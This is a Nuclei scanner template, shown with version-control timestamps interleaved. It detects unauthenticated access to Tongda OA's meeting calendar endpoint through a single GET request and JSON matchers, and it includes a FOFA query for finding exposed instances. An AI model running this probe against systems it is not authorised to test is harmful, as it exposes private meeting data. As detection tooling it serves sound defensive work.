2023-09-06 19:45:50 +00:00
|
|
|
id: tongda-meeting-unauth
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: Tongda OA Meeting - Unauthorized Access
|
|
|
|
|
author: SleepingBag945
|
|
|
|
|
severity: medium
|
|
|
|
|
description: |
|
2023-09-14 19:11:38 +00:00
|
|
|
Tongda Meeting Unauthorized Access were Detected.
|
2023-09-06 19:45:50 +00:00
|
|
|
reference:
|
2023-09-14 19:11:38 +00:00
|
|
|
- https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10
|
2024-09-10 09:08:16 +00:00
|
|
|
classification:
|
|
|
|
|
cpe: cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*
|
2023-09-06 19:45:50 +00:00
|
|
|
metadata:
|
|
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 1
|
2024-09-10 08:22:50 +00:00
|
|
|
vendor: tongda2000
|
2024-09-10 09:08:16 +00:00
|
|
|
product: office_anywhere
|
|
|
|
|
fofa-query: app="TDXK-通达OA"
|
2023-09-06 19:45:50 +00:00
|
|
|
tags: tongda,unauth,misconfig
|
|
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay"
|
|
|
|
|
|
|
|
|
|
matchers:
|
2023-09-14 19:11:38 +00:00
|
|
|
- type: dsl
|
|
|
|
|
dsl:
|
|
|
|
|
- status_code == 200 && contains(header, 'application/json')
|
|
|
|
|
- contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":')
|
2023-10-14 11:27:55 +00:00
|
|
|
condition: and
|
2024-09-12 05:14:01 +00:00
|
|
|
# digest: 4a0a00473045022100f75c4519458126a059beea57848ab33ba1ccebec41303605cb575b3f7adb649102205d998a85629f2c915074754a15b0bdbff134d6a42cc09d81da9bc9b91f9d5eca:922c64590222798bb761d5b6d8e72950
|
